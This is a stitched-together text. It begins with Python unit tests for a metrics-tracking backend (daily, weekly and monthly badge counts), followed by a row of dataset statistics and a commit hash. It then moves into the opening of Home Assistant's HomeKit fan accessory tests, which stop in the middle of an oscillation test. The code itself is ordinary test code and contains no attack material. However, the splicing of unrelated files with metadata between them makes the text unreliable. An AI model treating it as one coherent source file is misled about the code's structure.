def test_get_metrics_by_week(self):
user_id = 1234
metric = "badge:25"
metric2 = "badge:26"
from_date = datetime.date(year=2012, month=4, day=2)
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=7), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=9), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric2, datetime.datetime(year=2012, month=4, day=11), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric2, datetime.datetime(year=2012, month=4, day=18), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric2, datetime.datetime(year=2012, month=4, day=30)))
results = self._backend.get_metrics([(user_id, metric,), (user_id, metric2)], from_date, limit=5, group_by="week")
#metric 1
eq_(len(results[0][0]), 5)
eq_(results[0][1]["2012-04-02"], 4)
eq_(results[0][1]["2012-04-09"], 2)
eq_(results[0][1]["2012-04-16"], 0)
eq_(results[0][1]["2012-04-23"], 0)
eq_(results[0][1]["2012-04-30"], 0)
#metric 2
eq_(len(results[1][0]), 5)
eq_(results[1][1]["2012-04-02"], 0)
eq_(results[1][1]["2012-04-09"], 2)
eq_(results[1][1]["2012-04-16"], 3)
eq_(results[1][1]["2012-04-23"], 0)
eq_(results[1][1]["2012-04-30"], 1)
def test_track_metric_for_multi_users_at_the_same_time(self):
user_id = 1234
user_id2 = "user:5678"
metric = "badge:25"
from_date = datetime.date(year=2012, month=4, day=2)
ok_(self._backend.track_metric([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=5), inc_amt=2))
ok_(self._backend.track_metric([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=7), inc_amt=2))
ok_(self._backend.track_metric([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=9), inc_amt=2))
ok_(self._backend.track_metric([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=11), inc_amt=2))
ok_(self._backend.track_metric([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=18), inc_amt=3))
ok_(self._backend.track_metric([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=30)))
series, values = self._backend.get_metric_by_week(user_id, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-02"], 4)
eq_(values["2012-04-09"], 4)
eq_(values["2012-04-16"], 3)
eq_(values["2012-04-23"], 0)
eq_(values["2012-04-30"], 1)
series, values = self._backend.get_metric_by_week(user_id2, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-02"], 4)
eq_(values["2012-04-09"], 4)
eq_(values["2012-04-16"], 3)
eq_(values["2012-04-23"], 0)
eq_(values["2012-04-30"], 1)
def test_track_metric_multiple_metrics_at_the_same_time(self):
date = datetime.date(year=2011, month=12, day=1)
user_id = "user1234"
metric = "badges:21"
metric2 = "badge:22"
#track some metrics
ok_(self._backend.track_metric(user_id, [metric, metric2], datetime.datetime(year=2011, month=12, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, [metric, metric2], datetime.datetime(year=2011, month=12, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, [metric, metric2], datetime.datetime(year=2011, month=12, day=30), inc_amt=5))
results = self._backend.get_metrics([(user_id, metric,), (user_id, metric2,)], date, limit=30, group_by="day")
#metric
eq_(len(results[0][0]), 30)
eq_(len(results[0][1].keys()), 30)
eq_(results[0][1]["2011-12-05"], 2)
eq_(results[0][1]["2011-12-08"], 3)
eq_(results[0][1]["2011-12-30"], 5)
#metric 2
eq_(len(results[1][0]), 30)
eq_(len(results[1][1].keys()), 30)
eq_(results[1][1]["2011-12-05"], 2)
eq_(results[1][1]["2011-12-08"], 3)
eq_(results[1][1]["2011-12-30"], 5)
def test_track_multi_metrics_for_multi_users_at_the_same_time(self):
user_id = 1234
user_id2 = "user:5678"
metric = "metric1"
metric2 = "metric2"
from_date = datetime.date(year=2012, month=4, day=2)
ok_(self._backend.track_metric([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=5), inc_amt=2))
ok_(self._backend.track_metric([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=7), inc_amt=2))
ok_(self._backend.track_metric([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=9), inc_amt=2))
ok_(self._backend.track_metric([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=11), inc_amt=2))
ok_(self._backend.track_metric([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=18), inc_amt=3))
ok_(self._backend.track_metric([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=30)))
series, values = self._backend.get_metric_by_week(user_id, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-02"], 4)
eq_(values["2012-04-09"], 4)
eq_(values["2012-04-16"], 3)
eq_(values["2012-04-23"], 0)
eq_(values["2012-04-30"], 1)
series, values = self._backend.get_metric_by_week(user_id2, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-02"], 4)
eq_(values["2012-04-09"], 4)
eq_(values["2012-04-16"], 3)
eq_(values["2012-04-23"], 0)
eq_(values["2012-04-30"], 1)
series, values = self._backend.get_metric_by_week(user_id, metric2, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-02"], 4)
eq_(values["2012-04-09"], 4)
eq_(values["2012-04-16"], 3)
eq_(values["2012-04-23"], 0)
eq_(values["2012-04-30"], 1)
series, values = self._backend.get_metric_by_week(user_id2, metric2, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-02"], 4)
eq_(values["2012-04-09"], 4)
eq_(values["2012-04-16"], 3)
eq_(values["2012-04-23"], 0)
eq_(values["2012-04-30"], 1)
def test_set_metric_by_day(self):
date = datetime.date(year=2011, month=12, day=1)
user_id = 1234
metric = "metric1"
#set some metrics
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=5), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=8), 3, sync_agg=False))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=30), 5, sync_agg=False))
series, values = self._backend.get_metric_by_day(user_id, metric, date, 30)
eq_(len(series), 30)
eq_(len(values.keys()), 30)
eq_(values["2011-12-05"], 2)
eq_(values["2011-12-08"], 3)
eq_(values["2011-12-30"], 5)
def test_set_metric_by_day_incr_then_set(self):
date = datetime.date(year=2011, month=12, day=1)
user_id = 1234
metric = "metric1"
from_date = datetime.date(year=2012, month=4, day=2)
#track some metrics
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=30), inc_amt=5))
#set some metrics
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=5), 1, sync_agg=False))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=8), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=30), 4, sync_agg=False))
series, values = self._backend.get_metric_by_day(user_id, metric, date, 30)
eq_(len(series), 30)
eq_(len(values.keys()), 30)
eq_(values["2011-12-05"], 1)
eq_(values["2011-12-08"], 2)
eq_(values["2011-12-30"], 4)
def test_set_metric_by_day_set_then_incr(self):
date = datetime.date(year=2011, month=12, day=1)
user_id = 1234
metric = "metric1"
from_date = datetime.date(year=2012, month=4, day=2)
#set some metrics
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=5), 1, sync_agg=False))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=8), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=30), 4, sync_agg=False))
#track some metrics
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=30), inc_amt=5))
series, values = self._backend.get_metric_by_day(user_id, metric, date, 30)
eq_(len(series), 30)
eq_(len(values.keys()), 30)
eq_(values["2011-12-05"], 3)
eq_(values["2011-12-08"], 5)
eq_(values["2011-12-30"], 9)
def test_set_metric_by_day_multiple_metrics_at_the_same_time(self):
date = datetime.date(year=2011, month=12, day=1)
user_id = "user1234"
metric = "badges:21"
metric2 = "badge:22"
#set some metrics
ok_(self._backend.set_metric_by_day(user_id, [metric, metric2], datetime.datetime(year=2011, month=12, day=5), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day(user_id, [metric, metric2], datetime.datetime(year=2011, month=12, day=8), 3, sync_agg=False))
ok_(self._backend.set_metric_by_day(user_id, [metric, metric2], datetime.datetime(year=2011, month=12, day=30), 5, sync_agg=False))
results = self._backend.get_metrics([(user_id, metric,), (user_id, metric2,)], date, limit=30, group_by="day")
#metric
eq_(len(results[0][0]), 30)
eq_(len(results[0][1].keys()), 30)
eq_(results[0][1]["2011-12-05"], 2)
eq_(results[0][1]["2011-12-08"], 3)
eq_(results[0][1]["2011-12-30"], 5)
#metric 2
eq_(len(results[1][0]), 30)
eq_(len(results[1][1].keys()), 30)
eq_(results[1][1]["2011-12-05"], 2)
eq_(results[1][1]["2011-12-08"], 3)
eq_(results[1][1]["2011-12-30"], 5)
def test_set_metric_by_day_for_multi_users_at_the_same_time_with_sync(self):
user_id = 1234
user_id2 = "user:5678"
metric = "badge:25"
from_date = datetime.date(year=2012, month=4, day=2)
#set some metrics
ok_(self._backend.set_metric_by_day([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=5), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=7), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=9), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=11), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=18), 3, sync_agg=False))
ok_(self._backend.set_metric_by_day([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=30), 1, sync_agg=False))
#user_id
series, values = self._backend.get_metric_by_day(user_id, metric, from_date, limit=30)
eq_(len(series), 30)
eq_(values["2012-04-05"], 2)
eq_(values["2012-04-07"], 2)
eq_(values["2012-04-09"], 2)
eq_(values["2012-04-11"], 2)
eq_(values["2012-04-18"], 3)
eq_(values["2012-04-30"], 1)
#user_id2
series, values = self._backend.get_metric_by_day(user_id2, metric, from_date, limit=30)
eq_(len(series), 30)
eq_(values["2012-04-05"], 2)
eq_(values["2012-04-07"], 2)
eq_(values["2012-04-09"], 2)
eq_(values["2012-04-11"], 2)
eq_(values["2012-04-18"], 3)
eq_(values["2012-04-30"], 1)
def test_set_metric_by_day_for_multi_metrics_for_multi_users_at_the_same_time(self):
user_id = 1234
user_id2 = "user:5678"
metric = "metric1"
metric2 = "metric2"
from_date = datetime.date(year=2012, month=4, day=2)
#set some metrics
ok_(self._backend.set_metric_by_day([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=5), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=7), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=9), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=11), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=18), 3, sync_agg=False))
ok_(self._backend.set_metric_by_day([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=30), 1, sync_agg=False))
#user_id, metric
series, values = self._backend.get_metric_by_day(user_id, metric, from_date, limit=30)
eq_(len(series), 30)
eq_(values["2012-04-05"], 2)
eq_(values["2012-04-07"], 2)
eq_(values["2012-04-09"], 2)
eq_(values["2012-04-11"], 2)
eq_(values["2012-04-18"], 3)
eq_(values["2012-04-30"], 1)
#user_id2, metric
series, values = self._backend.get_metric_by_day(user_id2, metric, from_date, limit=30)
eq_(len(series), 30)
eq_(values["2012-04-05"], 2)
eq_(values["2012-04-07"], 2)
eq_(values["2012-04-09"], 2)
eq_(values["2012-04-11"], 2)
eq_(values["2012-04-18"], 3)
eq_(values["2012-04-30"], 1)
#user_id, metric2
series, values = self._backend.get_metric_by_day(user_id, metric2, from_date, limit=30)
eq_(len(series), 30)
eq_(values["2012-04-05"], 2)
eq_(values["2012-04-07"], 2)
eq_(values["2012-04-09"], 2)
eq_(values["2012-04-11"], 2)
eq_(values["2012-04-18"], 3)
eq_(values["2012-04-30"], 1)
#user_id2, metric2
series, values = self._backend.get_metric_by_day(user_id2, metric2, from_date, limit=30)
eq_(len(series), 30)
eq_(values["2012-04-05"], 2)
eq_(values["2012-04-07"], 2)
eq_(values["2012-04-09"], 2)
eq_(values["2012-04-11"], 2)
eq_(values["2012-04-18"], 3)
eq_(values["2012-04-30"], 1)
def test_get_counts_after_set_metric_by_day(self):
user_id = 1234
metric = "badge:25"
#track some metrics
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=5), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=5), inc_amt=5))
count = self._backend.get_count(user_id, metric)
#count should be at 10
eq_(count, 10)
#set some metrics
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2012, month=4, day=5), 2))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2012, month=4, day=7), 2))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2012, month=4, day=9), 2))
count = self._backend.get_count(user_id, metric)
#count should be at 6
eq_(count, 6)
def test_get_counts_after_set_metric_by_day_update_counter_false(self):
user_id = 1234
metric = "badge:25"
#track some metrics
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=5), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=5), inc_amt=5))
count = self._backend.get_count(user_id, metric)
#count should be at 10
eq_(count, 10)
#set some metrics
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2012, month=4, day=5), 2, update_counter=False))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2012, month=4, day=7), 2, update_counter=False))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2012, month=4, day=9), 2, update_counter=False))
count = self._backend.get_count(user_id, metric)
#count should be at 10
eq_(count, 10)
def test_sync_agg_metric(self):
date = datetime.date(year=2011, month=12, day=1)
user_id = 1234
metric = "metric1"
from_date = datetime.datetime(year=2011, month=12, day=5)
#set some metrics
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=5), 2))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=8), 3))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=30), 5))
series, values = self._backend.get_metric_by_week(user_id, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2011-12-05"], 5)
eq_(values["2011-12-12"], 0)
eq_(values["2011-12-19"], 0)
eq_(values["2011-12-26"], 5)
eq_(values["2012-01-02"], 0)
series, values = self._backend.get_metric_by_month(user_id, metric, from_date, limit=2)
eq_(len(series), 2)
eq_(values["2011-12-01"], 10)
eq_(values["2012-01-01"], 0)
def test_no_sync_with_set_metric_by_day(self):
date = datetime.date(year=2011, month=12, day=1)
user_id = 1234
metric = "metric1"
from_date = datetime.datetime(year=2011, month=12, day=5)
#set some metrics
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=5), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=8), 3, sync_agg=False))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=30), 5, sync_agg=False))
series, values = self._backend.get_metric_by_week(user_id, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2011-12-05"], 0)
eq_(values["2011-12-12"], 0)
eq_(values["2011-12-19"], 0)
eq_(values["2011-12-26"], 0)
eq_(values["2012-01-02"], 0)
series, values = self._backend.get_metric_by_month(user_id, metric, from_date, limit=2)
eq_(len(series), 2)
eq_(values["2011-12-01"], 0)
eq_(values["2012-01-01"], 0)
def test_sync_agg_metric_localized_scope(self):
date = datetime.date(year=2011, month=12, day=1)
user_id = 1234
metric = "metric1"
from_date = datetime.datetime(year=2011, month=12, day=5)
#set some metrics
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=1), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=15), 3, sync_agg=True))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=30), 5, sync_agg=False))
series, values = self._backend.get_metric_by_week(user_id, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2011-12-05"], 0)
eq_(values["2011-12-12"], 3)
eq_(values["2011-12-19"], 0)
eq_(values["2011-12-26"], 0)
eq_(values["2012-01-02"], 0)
series, values = self._backend.get_metric_by_month(user_id, metric, from_date, limit=2)
eq_(len(series), 2)
eq_(values["2011-12-01"], 5) # The first set metric to 2 will be calculated when the sync is called for the second set call
eq_(values["2012-01-01"], 0)
def test_sync_agg_metric_for_multi_users_at_the_same_time_with_sync(self):
user_id = 1234
user_id2 = "user:5678"
metric = "badge:25"
from_date = datetime.date(year=2012, month=4, day=2)
#set some metrics
ok_(self._backend.set_metric_by_day([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=5), 2))
ok_(self._backend.set_metric_by_day([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=7), 2))
ok_(self._backend.set_metric_by_day([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=9), 2))
ok_(self._backend.set_metric_by_day([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=11), 2))
ok_(self._backend.set_metric_by_day([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=18), 3))
ok_(self._backend.set_metric_by_day([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=30), 1))
#user_id
series, values = self._backend.get_metric_by_week(user_id, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-02"], 4)
eq_(values["2012-04-09"], 4)
eq_(values["2012-04-16"], 3)
eq_(values["2012-04-23"], 0)
eq_(values["2012-04-30"], 1)
#user_id2
series, values = self._backend.get_metric_by_week(user_id2, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-02"], 4)
eq_(values["2012-04-09"], 4)
eq_(values["2012-04-16"], 3)
eq_(values["2012-04-23"], 0)
eq_(values["2012-04-30"], 1)
#user_id
series, values = self._backend.get_metric_by_month(user_id, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-01"], 12)
#user_id2
series, values = self._backend.get_metric_by_month(user_id2, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-01"], 12)
def test_sync_agg_metric_multiple_metrics_at_the_same_time(self):
date = datetime.date(year=2011, month=12, day=1)
user_id = "user1234"
metric = "badges:21"
metric2 = "badge:22"
#set some metrics
ok_(self._backend.set_metric_by_day(user_id, [metric, metric2], datetime.datetime(year=2011, month=12, day=5), 2))
ok_(self._backend.set_metric_by_day(user_id, [metric, metric2], datetime.datetime(year=2011, month=12, day=8), 3))
ok_(self._backend.set_metric_by_day(user_id, [metric, metric2], datetime.datetime(year=2011, month=12, day=30), 5))
results = self._backend.get_metrics([(user_id, metric,), (user_id, metric2,)], date, limit=5, group_by="week")
#metric
eq_(len(results[0][0]), 5)
eq_(len(results[0][1].keys()), 5)
eq_(results[1][1]["2011-12-05"], 5)
eq_(results[1][1]["2011-12-26"], 5)
#metric 2
eq_(len(results[1][0]), 5)
eq_(len(results[1][1].keys()), 5)
eq_(results[1][1]["2011-12-05"], 5)
eq_(results[1][1]["2011-12-26"], 5)
results = self._backend.get_metrics([(user_id, metric,), (user_id, metric2,)], date, limit=1, group_by="month")
#metric
eq_(len(results[0][0]), 1)
eq_(len(results[0][1].keys()), 1)
eq_(results[1][1]["2011-12-01"], 10)
#metric 2
eq_(len(results[1][0]), 1)
eq_(len(results[1][1].keys()), 1)
eq_(results[1][1]["2011-12-01"], 10)
def test_sync_agg_metric_for_multi_users_at_the_same_time(self):
user_id = 1234
user_id2 = "user:5678"
metric = "metric1"
metric2 = "metric2"
from_date = datetime.date(year=2012, month=4, day=2)
#set some metrics
ok_(self._backend.set_metric_by_day([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=5), 2))
ok_(self._backend.set_metric_by_day([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=7), 2))
ok_(self._backend.set_metric_by_day([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=9), 2))
ok_(self._backend.set_metric_by_day([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=11), 2))
ok_(self._backend.set_metric_by_day([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=18), 3))
ok_(self._backend.set_metric_by_day([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=30), 1))
#user_id, metric
series, values = self._backend.get_metric_by_week(user_id, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-02"], 4)
eq_(values["2012-04-09"], 4)
eq_(values["2012-04-16"], 3)
eq_(values["2012-04-23"], 0)
eq_(values["2012-04-30"], 1)
#user_id2, metric
series, values = self._backend.get_metric_by_week(user_id2, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-02"], 4)
eq_(values["2012-04-09"], 4)
eq_(values["2012-04-16"], 3)
eq_(values["2012-04-23"], 0)
eq_(values["2012-04-30"], 1)
#user_id, metric2
series, values = self._backend.get_metric_by_week(user_id, metric2, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-02"], 4)
eq_(values["2012-04-09"], 4)
eq_(values["2012-04-16"], 3)
eq_(values["2012-04-23"], 0)
eq_(values["2012-04-30"], 1)
#user_id2, metric2
series, values = self._backend.get_metric_by_week(user_id2, metric2, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-02"], 4)
eq_(values["2012-04-09"], 4)
eq_(values["2012-04-16"], 3)
eq_(values["2012-04-23"], 0)
eq_(values["2012-04-30"], 1)
| 47.895437 | 156 | 0.645358 | 7,861 | 50,386 | 3.872281 | 0.026841 | 0.052431 | 0.110381 | 0.105059 | 0.946912 | 0.932523 | 0.924244 | 0.909461 | 0.888009 | 0.879862 | 0 | 0.102951 | 0.200353 | 50,386 | 1,051 | 157 | 47.941009 | 0.652553 | 0.039813 | 0 | 0.684967 | 0 | 0 | 0.055286 | 0.000621 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057516 | false | 0 | 0.006536 | 0 | 0.065359 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8111d256594affddcde6925851662fdecd27da25 | 17,626 | py | Python | tests/components/homekit/test_type_fans.py | kangaroomadman/core | 73d7d80731a5f18915e4e871111b752d1137ff66 | [
"Apache-2.0"
] | 4 | 2016-06-22T12:00:41.000Z | 2018-06-11T20:31:25.000Z | tests/components/homekit/test_type_fans.py | kangaroomadman/core | 73d7d80731a5f18915e4e871111b752d1137ff66 | [
"Apache-2.0"
] | 57 | 2020-10-15T06:47:00.000Z | 2022-03-31T06:11:18.000Z | tests/components/homekit/test_type_fans.py | kangaroomadman/core | 73d7d80731a5f18915e4e871111b752d1137ff66 | [
"Apache-2.0"
] | 6 | 2019-07-06T00:43:13.000Z | 2021-01-16T13:27:06.000Z | """Test different accessory types: Fans."""
from pyhap.const import HAP_REPR_AID, HAP_REPR_CHARS, HAP_REPR_IID, HAP_REPR_VALUE
from homeassistant.components.fan import (
ATTR_DIRECTION,
ATTR_OSCILLATING,
ATTR_PERCENTAGE,
DIRECTION_FORWARD,
DIRECTION_REVERSE,
DOMAIN,
SUPPORT_DIRECTION,
SUPPORT_OSCILLATE,
SUPPORT_SET_SPEED,
)
from homeassistant.components.homekit.const import ATTR_VALUE
from homeassistant.components.homekit.type_fans import Fan
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_SUPPORTED_FEATURES,
EVENT_HOMEASSISTANT_START,
STATE_OFF,
STATE_ON,
STATE_UNKNOWN,
)
from homeassistant.core import CoreState
from homeassistant.helpers import entity_registry
from tests.common import async_mock_service
async def test_fan_basic(hass, hk_driver, events):
"""Test fan with char state."""
entity_id = "fan.demo"
hass.states.async_set(entity_id, STATE_ON, {ATTR_SUPPORTED_FEATURES: 0})
await hass.async_block_till_done()
acc = Fan(hass, hk_driver, "Fan", entity_id, 1, None)
hk_driver.add_accessory(acc)
assert acc.aid == 1
assert acc.category == 3 # Fan
assert acc.char_active.value == 1
# If there are no speed_list values, then HomeKit speed is unsupported
assert acc.char_speed is None
await acc.run_handler()
await hass.async_block_till_done()
assert acc.char_active.value == 1
hass.states.async_set(entity_id, STATE_OFF, {ATTR_SUPPORTED_FEATURES: 0})
await hass.async_block_till_done()
assert acc.char_active.value == 0
hass.states.async_set(entity_id, STATE_UNKNOWN)
await hass.async_block_till_done()
assert acc.char_active.value == 0
hass.states.async_remove(entity_id)
await hass.async_block_till_done()
assert acc.char_active.value == 0
# Set from HomeKit
call_turn_on = async_mock_service(hass, DOMAIN, "turn_on")
call_turn_off = async_mock_service(hass, DOMAIN, "turn_off")
char_active_iid = acc.char_active.to_HAP()[HAP_REPR_IID]
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_active_iid,
HAP_REPR_VALUE: 1,
},
]
},
"mock_addr",
)
await hass.async_block_till_done()
assert call_turn_on
assert call_turn_on[0].data[ATTR_ENTITY_ID] == entity_id
assert len(events) == 1
assert events[-1].data[ATTR_VALUE] is None
hass.states.async_set(entity_id, STATE_ON)
await hass.async_block_till_done()
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_active_iid,
HAP_REPR_VALUE: 0,
},
]
},
"mock_addr",
)
await hass.async_block_till_done()
assert call_turn_off
assert call_turn_off[0].data[ATTR_ENTITY_ID] == entity_id
assert len(events) == 2
assert events[-1].data[ATTR_VALUE] is None
async def test_fan_direction(hass, hk_driver, events):
"""Test fan with direction."""
entity_id = "fan.demo"
hass.states.async_set(
entity_id,
STATE_ON,
{ATTR_SUPPORTED_FEATURES: SUPPORT_DIRECTION, ATTR_DIRECTION: DIRECTION_FORWARD},
)
await hass.async_block_till_done()
acc = Fan(hass, hk_driver, "Fan", entity_id, 1, None)
hk_driver.add_accessory(acc)
assert acc.char_direction.value == 0
await acc.run_handler()
await hass.async_block_till_done()
assert acc.char_direction.value == 0
hass.states.async_set(entity_id, STATE_ON, {ATTR_DIRECTION: DIRECTION_REVERSE})
await hass.async_block_till_done()
assert acc.char_direction.value == 1
# Set from HomeKit
call_set_direction = async_mock_service(hass, DOMAIN, "set_direction")
char_direction_iid = acc.char_direction.to_HAP()[HAP_REPR_IID]
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_direction_iid,
HAP_REPR_VALUE: 0,
},
]
},
"mock_addr",
)
await hass.async_block_till_done()
assert call_set_direction[0]
assert call_set_direction[0].data[ATTR_ENTITY_ID] == entity_id
assert call_set_direction[0].data[ATTR_DIRECTION] == DIRECTION_FORWARD
assert len(events) == 1
assert events[-1].data[ATTR_VALUE] == DIRECTION_FORWARD
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_direction_iid,
HAP_REPR_VALUE: 1,
},
]
},
"mock_addr",
)
await hass.async_add_executor_job(acc.char_direction.client_update_value, 1)
await hass.async_block_till_done()
assert call_set_direction[1]
assert call_set_direction[1].data[ATTR_ENTITY_ID] == entity_id
assert call_set_direction[1].data[ATTR_DIRECTION] == DIRECTION_REVERSE
assert len(events) == 2
assert events[-1].data[ATTR_VALUE] == DIRECTION_REVERSE
async def test_fan_oscillate(hass, hk_driver, events):
"""Test fan with oscillate."""
entity_id = "fan.demo"
hass.states.async_set(
entity_id,
STATE_ON,
{ATTR_SUPPORTED_FEATURES: SUPPORT_OSCILLATE, ATTR_OSCILLATING: False},
)
await hass.async_block_till_done()
